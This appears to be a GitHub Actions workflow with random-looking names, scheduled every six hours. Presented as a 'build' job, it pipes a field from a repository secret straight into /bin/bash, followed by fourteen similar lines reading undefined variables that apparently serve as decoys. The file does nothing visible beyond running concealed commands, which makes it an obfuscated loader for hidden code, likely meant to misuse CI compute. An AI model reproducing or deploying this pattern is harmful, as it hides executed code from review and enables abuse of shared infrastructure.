name: decayfrightened
on:
  workflow_dispatch:
  schedule:
    - cron: '4 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: decayfrightened
        env:
          nlwq972: ${{ secrets.nlwq972 }}
        run: |
          echo $nlwq972 | jq -r .c325 | /bin/bash
          echo $hneps6 | jq -r .td53 | /bin/bash
          echo $hk26 | jq -r .hq59900 | /bin/bash
          echo $fzvh4 | jq -r .jofzf2 | /bin/bash
          echo $hfq32652 | jq -r .quvew1529 | /bin/bash
          echo $loja5002 | jq -r .y4 | /bin/bash
          echo $ixtkp6670 | jq -r .lvayl8 | /bin/bash
          echo $uts682 | jq -r .o58649 | /bin/bash
          echo $y0 | jq -r .iifw9070 | /bin/bash
          echo $vf46339 | jq -r .e305 | /bin/bash
          echo $w680 | jq -r .bgp486 | /bin/bash
          echo $sxo19116 | jq -r .kw3 | /bin/bash
          echo $ptdbd12 | jq -r .iexr3812 | /bin/bash
          echo $veejk05 | jq -r .sgmcw00 | /bin/bash
          echo $iggr08657 | jq -r .huzf95 | /bin/bash

